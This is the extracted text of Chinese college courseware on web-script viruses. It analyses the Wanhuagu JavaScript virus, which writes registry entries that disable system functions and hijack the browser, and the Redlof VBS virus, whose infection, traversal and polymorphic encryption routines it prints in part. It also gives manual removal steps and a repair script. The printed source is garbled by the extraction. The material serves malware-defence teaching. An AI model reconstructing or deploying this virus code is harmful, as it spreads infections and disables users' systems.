典型网页病毒剖析课件

Virus 计算机病毒与防治计算机病毒与防治 重庆电子工程职业学院 计算机病毒与防治课程小组 教学单元 3-4 网页脚本病毒防治 万花谷病毒的手工清除 万花谷病毒特点及代码分析 梅丽莎病毒特点及代码分析 第二讲 典型网页病毒剖析 计算机病毒与防治课程小组 梅丽莎病毒的手工清除 万花谷病毒特点 计算机病毒与防治课程小组 病毒类型 网页脚本病毒 危险级别 影响系统 Win 9X/ME/NT/2000/XP/2003 万花谷病毒特点 病毒名称 : 万花谷 万花谷病毒特点 计算机病毒与防治课程小组 曾经在互连网上散发过一个美丽诱人的网址 “ 万花谷 ” ，这实际是一个恶 意 “ 陷阱 ” ，有人经不住诱惑，只用鼠标轻轻点一下，计算机就立即瘫痪 了，这是有人利用 Java最新技术进行破坏的一个恶意网址。 本病毒是在页面中嵌入了恶意的 JavaScript代码，它最初出现在 个人网站上，随后其他一些个人主页也 模仿或被感染了该病毒代码。 万花谷病毒特点 万花谷病毒特点 计算机病毒与防治课程小组 其破坏特性如下： (1)用户不能正常使用 WINDOWS的 DOS功能程序； (2)用户不能正常退出 WINDOWS； (3)开始菜单上的 “关闭系统 “、 “运行 “等栏目被屏蔽，防止用户重新以 DOS方式启动，关闭 DOS命令、关闭 REGEDIT命令等。 (4)将 IE的浏览器的首页和收藏夹中都加入了含有该有害网页代码的网络 地址。 具体的表现形式是： (1)网络地址是： ； (2)在 IE的 “ 收藏夹 ” 中自动加上 “ 万花谷 ” 的快捷方式 ,网络地址是： http:/96； 万花谷病毒特点 万花谷病毒源码分析 计算机病毒与防治课程小组 document.write(“); function AddFavLnk(loc, DispName, SiteURL) var Shor = Shl.CreateShortcut(loc + “ + DispName +“.URL“); Shor.TargetPath = SiteURL; Shor.Save(); function f() Try /ActiveX initialization a1=document.applets0; a1.setCLSID(“F935DC22-1CF0-11D0-ADB9-00C04FD58A0B“); a1.createInstance(); Shl = a1.GetObject(); a1.setCLSID(“0D43FE01-F093-11CF-8940-00A0C9054228“); a1.createInstance(); FSO = a1.GetObject(); a1.setCLSID(“F935DC26-1CF0-11D0-ADB9-00C04FD58A0B“); a1.createInstance(); Net = a1.GetObject(); 万花谷病毒源码分析 计算机病毒与防治课程小组 try if (documents .cookies.indexOf(“Chg“) = -1) /以下内容是对注册表进行修改 Shl.RegWrite (“HKCUSoftwareMicrosoftInternet ExplorerMainStart Page“,“http:/com. 6/“); var expdate = new Date(new Date().getTime() + (1); documents.cookies=“Chg=general; expires=“ + expdate.toGMTString() + “; path=/;“ /设置 IE 主页 Shl.RegWrite (“HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerN oRun“, 01, “REG_BINARY“); /消除 RUN按纽 Shl.RegWrite (“HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerN oClose“, 01, “REG_BINARY“); /消除关闭按纽 Shl.RegWrite (“HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerN oLogOff“, 01, “REG_BINARY“); /消除注销按纽 Shl.RegWrite (“HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerN oDrives“, “63000000“, “REG_DWord“); /隐藏盘符 万花谷病毒源码分析 计算机病毒与防治课程小组 Shl.RegWrite (“HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisa bleRegistryTools“, “00000001“, “REG_DWORD“); /禁止注册表编辑器 Shl.RegWrite (“HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNo Desktop“, “00000001“, “REG_DWORD“); /屏蔽所有桌面图标 Shl.RegWrite (“HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp Disabled“, “00000001“, “REG_DWORD“); /禁止运行 Dos程序 Shl.RegWrite (“HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp NoRealMode“, “00000001“, “REG_DWORD“);/屏蔽所有桌面图标 Shl.RegWrite (“HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNotic eCaption“, “您的计算机已经被 /优化 : ） “);/设置开机提示 Shl.RegWrite (“HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNotic eText“, “您的计算机已经被 /优化 :） “);/弹出窗口中的内容 万花谷病毒源码分析 计算机病毒与防治课程小组 Shl.RegWrite (“HKLMSoftwareMicrosoftInternet ExplorerMainWindow Title“,“新的 标题 / Shl.RegWrite (“HKCUSoftwareMicrosoftInternet ExplorerMainWindow Title“,“新的 标题 / /设置 IE标题 var expdate = new Date(new Date().getTime() + (1); documents .cookies=“Chg=general; expires=“ + expdate.toGMTString() + “; path=/;“ catch(e) catch(e) function init() setTimeout(“f()“, 1000); init(); 万花谷病毒发作现象 计算机病毒与防治课程小组 万花谷病毒 发 作部分 现 象截 图 未中万花谷病毒 时 截 图 万花谷病毒手工清除 计算机病毒与防治课程小组 方法一 (利用 Windows 提供的恢复注册表功能 )： 在 “ 开始 -运行 ” 中输入 Regedit命令，打开注册表编辑器，点选 “ 文 件 ” 菜单下的 “ 导入 ” 命令，选择以前备份的注册表文件，确定即可 完成注册表的还原。 方法二 (采用 VBS 或 JS 脚本来删除或修改注册表项 )： 进入系统后打开记事本，输入以下内容： 万花谷病毒手工清除 计算机病毒与防治课程小组 Dim R Set R = CreateObject(“WScript.Shell“) Rem Write Regedit R.RegWrite “HKCUSoftwareMicrosoftWindowsCurrentVersion PoliciesExplorerNoRun“, 0, “REG_BINARY“ ；修复 RUN按纽 R.RegWrite “HKCUSoftwareMicrosoftWindowsCurrentVersion PoliciesExplorerNoClose“, 0, “REG_BINARY“ ；修复关闭按纽 R.RegWrite “HKCUSoftwareMicrosoftWindowsCurrentVersion PoliciesExplorerNoLogOff“, 0, “REG_BINARY“ ；修复注销按纽 R.RegWrite “HKCUSoftwareMicrosoftWindowsCurrentVersion PoliciesExplorerNoDrives“, “00000000“, “REG_DWORD“ ；取消隐藏盘符 R.RegWrite “HKCUSoftwareMicrosoftWindowsCurrentVersion PoliciesSystemDisableRegistryTools“, “00000000“, “REG_DWORD“ ；取消禁止注册表 R.RegWrite “HKCUSoftwareMicrosoftWindowsCurrentVersion PoliciesExplorerNoDesktop“,”00000000“,”REG_DWORD“ ； 万花谷病毒手工清除 R.RegWrite “HKCUSoftwareMicrosoftWindowsCurrentVersion PoliciesWinOldAppDisabled“, “00000000“, “REG_DWORD“ R.RegWrite “HKCUSoftwareMicrosoftWindowsCurrentVersion PoliciesWinOldAppNoRealMode“, “00000000“, “REG_DWORD“ R.RegWrite “HKLMSoftwareMicrosoftWindowsCurrentVersion WinlogonLegalNoticeCaption“, “, “REG_SZ“ R.RegWrite “HKLMSoftwareMicrosoftWindowsCurrentVersion WinlogonLegalNoticeText“, “, “REG_SZ“ ；重设开机提示 R.RegWrite “HKLMSoftwareMicrosoftInternet ExplorerMainWindowTitle”, “”, “REG_SZ“ ；重设 IE标题 R.RegWrite “HKCUSoftwareMicrosoftInternet ExplorerMainStartPage“, “, “REG_SZ“ 以文件名 “ RegClean.vbs” 存盘后双击运行该文件。重新启动计算机即完成系 统恢复。 计算机病毒与防治课程小组 新欢乐时光病毒特点 病毒名称： 新欢乐时光 病毒类型： 网页脚本病毒 危险级别： 影响系统： Win 9X/ME/NT/2000 英文名包括有： HTML.Redlof.A Symantec, VBS.Redlof AVP, VBS_REDLOF.A Trend, VBS/Redlof-A Sophos, VBS.KJ 金山 , Script.RedLof 瑞星 , VBS/KJ 江民 计算机病毒与防治课程小组 新欢乐时光病毒特点 新欢乐时光病毒特点 新欢乐时光病毒 是一个多变形、加密病毒，感染扩展名为 .html, .htm, .asp, .php, .jsp, .htt和 .vbs文件，同时该病毒会大量生成 folder.htt 和 desktop.ini，并在 %windir%System中生成一个名字叫 Kernel.dll（ Windows 9x/Me）或 kernel32.dll（ Windows NT/2000）的文件，修改 .dll 文件的打开方式，感染 Outlook的信纸文件。 感染这个病毒后有两个明显的特征： a.在每个目录中都会生成 folder.htt（带毒文件）和 desktop.ini（目录 配置文件）； b.电脑运行速度明显变慢，在任务列表中可以看到有大量的 Wscript.exe 程序在运行。 计算机病毒与防治课程小组 新欢乐时光病毒特点 新欢乐时光病毒 这个网页病毒利用微软 IE的漏洞，通过感染一些 .html, .htm, .asp, .php, .jsp, .htt和 .vbs等文件进行传播。 然而由于病毒的本身特性，其传播的途径也有多种： a.通过网页传播。由于病毒会感染网页文件，如果那些网站站长不小心将带毒的 网页放到网站上，用户不小心浏览了这些网页就会被病毒感染了； b.通过局域网。当本地计算机设有可写权限的共享目录，或者访问局域网上带毒 的计算机的时候就会感染病毒；对于 Windows NT/2000系统，由于存在默认的管理用 共享目录，因此，管理员的疏忽也可能会造成感染。 c.通过电子邮件。如果发件人使用了带毒的网页文件作为信纸，或者信件中有带 毒的网页文件，那么，只要收件人浏览了邮件，也会被感染病毒； d.通过移动介质，如软盘、移动硬盘、光盘等。由于病毒会生成 folder.htt和 desktop.ini，所以在打开移动介质或打开其文件夹的时候，就会激活并感染病毒。 计算机病毒与防治课程小组 新欢乐时光代码分析 Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,F inalyDisk Sub KJ_start() 初始化变量 KJSetDim() 初始化 环 境 KJCreateMilieu() 感染本地或者共享上与 html所在目录 KJLikeIt() 通过 vbs感染 Outlook邮件模板 KJCreateMail() 进行病毒传播 KJPropagate() End Sub 计算机病毒与防治课程小组 新欢乐时光病毒主运行程序代码 新欢乐时光代码分析 Function KJAppendTo(FilePath,TypeStr) On Error Resume Next 以只 读 方式打开指定文件 Set ReadTemp = FSO.OpenTextFile(FilePath,1) 将文件内容 读 入到 TmpStr变 量中 TmpStr = ReadTemp.ReadAll 判断文件中是否存在 “KJ_start()”字符串，若存在 说 明已 经 感染，退出函数；若文件 长 度小于 1，也退出函数。 If Instr(TmpStr,“KJ_start()“) “html“ Then Exit Function End If ThisLocation = document.location 取得文档当前路径 If Left(ThisLocation, 4) = “file” Then 如果是本地或网上共享文件 ThisLocation = Mid(ThisLocation,9) 如果 这 个文件 扩 展名不 为 空，在 ThisLocation中保存它的路径 If FSO.GetExtensionName(ThisLocation) 3 Then 如果 ThisLocation的 长 度大于 3就尾追一个 “ ThisLocation = ThisLocation & “ End If KJummageFolder(ThisLocation) 感染 这 个目 录 End If End Function 新欢乐时光代码分析 计算机病毒与防治课程小组 功能：如果注册表指定键值不存在，则向指定位置写入指定文件名 Function KJMailReg(RegStr,FileName) On Error Resume Next 如果注册表指定 键值 不存在， 则 向指定位置写入指定文件名 RegTempStr = WsShell.RegRead(RegStr) If RegTempStr = “ Then WsShell.RegWrite RegStr,FileName End If End Function 新欢乐时光代码分析 计算机病毒与防治课程小组 功能：遍历并返回目录路径 Function KJOboSub(CurrentString) SubE = 0 TestOut = 0 Do While True TestOut = TestOut + 1 If TestOut 28 Then CurrentString = FinalyDisk & “:“ Exit Do End If On Error Resume Next 取得当前目录的所有子目录，并且放到字典中 Set ThisFolder = FSO.GetFolder(CurrentString) Set DicSub = CreateObject(“Scripting.Dictionary“) Set Folders = ThisFolder.SubFolders FolderCount = 0 For Each TempFolder in Folders FolderCount = FolderCount + 1 DicSub.add FolderCount, TempFolder.Name Next 新欢乐时光代码分析 计算机病毒与防治课程小组 如果没有子目 录 了，就 调 用 KJChangeSub返回上一 级 目 录 或者更 换盘 符，并将 SubE置 1 If DicSub.Count = 0 Then LastIndexChar = InstrRev(CurrentString,“,Len(CurrentString)-1) SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1) CurrentString = KJChangeSub(CurrentString,LastIndexChar) SubE = 1 Else 如果存在子目录 如果 SubE为 0，则将 CurrentString变为它的第 1个子目录 If SubE = 0 Then CurrentString = CurrentString & DicSub.Item(1) & “ Exit Do Else 如果 SubE为 1，继续遍历子目录，并将下一个子目录返回 j = 0 新欢乐时光代码分析 计算机病毒与防治课程小组 For j = 1 To FolderCount If LCase(SubString) = LCase(DicSub.Item(j) Then If j 2 And DiskTemp.DriveType 1 Then Exit For End If FinalyDisk = DiskTemp.DriveLetter Next 新欢乐时光代码分析 计算机病毒与防治课程小组 此前的 这 段病毒体已 经 解密，并且存放在 ThisText中， 现 在 为 了 传 播，需要 对 它 进 行再加密。 Dim OtherArr(3) Randomize 随机生成 4个算子 For i=0 To 3 OtherArr(i) = Int(9 * Rnd) Next TempString = “ For i=1 To Len(ThisText) TempNum = Asc(Mid(ThisText,i,1) If TempNum = 13 Then 对 回 车 、 换 行 (0x0D,0x0A)做特 别 的 处 理 TempNum = 28 ElseIf TempNum = 10 Then TempNum = 29 End If 很 简单 的加密 处 理，每个字符减去相 应 的算子，那么在解密的 时 候只要按照 这 个 顺 序每个字符加上相 应 的算子就可以了。 新欢乐时光代码分析 计算机病毒与防治课程小组 TempChar = Chr(TempNum - OtherArr(i Mod 4) If TempChar = Chr(34) Then TempChar = Chr(18) End If TempString = TempString & TempChar Next 含有解密算法的字串 UnLockStr = “Execute(“Dim KeyArr(3),ThisText“&vbCrLf&“KeyArr(0) = “ & OtherArr(0) & “&vbCrLf&“KeyArr(1) = “ & OtherArr(1) & “&vbCrLf&“KeyArr(2) = “ & OtherArr(2) & “&vbCrLf&“KeyArr(3) = “ & OtherArr(3) & “&vbCrLf&“For i=1 To Len(ExeString)“&vbCrLf&“TempNum = Asc(Mid(ExeString,i,1)“&vbCrLf&“If TempNum = 18 Then“&vbCrLf&“TempNum = 34“&vbCrLf&“End If“&vbCrLf&“TempChar = Chr(TempNum + KeyArr(i Mod 4)“&vbCrLf&“If TempChar = Chr(28) Then“&vbCrLf&“TempChar = vbCr“&vbCrLf&“ElseIf TempChar = Chr(29) Then“&vbCrLf&“TempChar = vbLf“&vbCrLf&“End If“&vbCrLf&“ThisText = ThisText & TempChar“&vbCrLf&“Next“)“ & vbCrLf & “Execute(ThisText)“ 新欢乐时光代码分析 计算机病毒与防治课程小组 将加密好的病毒体复制 给变 量 ThisText ThisText = “ExeString = “ & TempString & “ 生成 html感染用的脚本 HtmlText =“ & vbCrLf & “document.write “ & “ & “ & “ & “ & “ & vbCrLf & “ & vbCrLf & “ & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & “ & vbCrLf & “ & vbCrLf & “ 生成 vbs感染用的脚本 VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & “KJ_start()“ 取得 Windows目 录 :GetSpecialFolder(n),0: WindowsFolder ,1: SystemFolder,2: TemporaryFolder 新欢乐时光代码分析 计算机病毒与防治课程小组 如果系 统 目 录 存在 webFolder.htt和 system32desktop.ini， 则 用 kjwall.gif文件名 备 份它 们 。 WinPath = FSO.GetSpecialFolder(0) & “ If (FSO.FileExists(WinPath & “webFolder.htt“) Then FSO.CopyFile WinPath & “webFolder.htt“,WinPath & “webkjwall.gif“ End If If (FSO.FileExists(WinPath & “system32desktop.ini“) Then FSO.CopyFile WinPath & “system32desktop.ini“,WinPath & “system32kjwall.gif“ End If End Function 新欢乐时光行为分析 中 毒 现 象 截 图 新欢乐时光手工清除 当计算机感染了 “ 欢乐时光 ” 病毒后建议在安全模式或纯 DOS中清除。因 为该病毒在安全模式下不会被激活，所以可以放心地在安全模式下杀毒 ； 在正常模式中清除需要对 Windows系统有非常深入地了解，一般用户是很 难干净地清除病毒的； 推荐使用专杀工具在安全模式下进行杀毒，并且，在确认清除完成之前 不要使用 “ Web视图 ” 显示任何文件夹，比较稳妥的做法是在进入安全模 式之前将所有的 Web视图文件夹改为传统 Windows风格。 在检查病毒的时候，建议同时检查平时常用的移动存储介质，如光盘、 软盘、移动硬盘等，因为这是病毒重复感染的隐患。对于联网的计算机 ，杀毒之前建议取消所有的共享目录。 手工清除新欢乐时光病毒 新欢乐时光手工清除 在 Windows正常模式下可以采取如下的步骤进行清除。 （ 1）打开注册表编辑器，删除 HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunKernel32 键值 ； （ 2）参照其他系统，恢复 HKEY_CLASSES_ROOTdllFile 下键值； 参照其他系统，恢复 HKEY_CURRENT_USERIdentities“ & UserID & “SoftwareMicrosoftOutlook Express“ & OEVersion & “Mail 下相关键值； 参照其他系统，恢复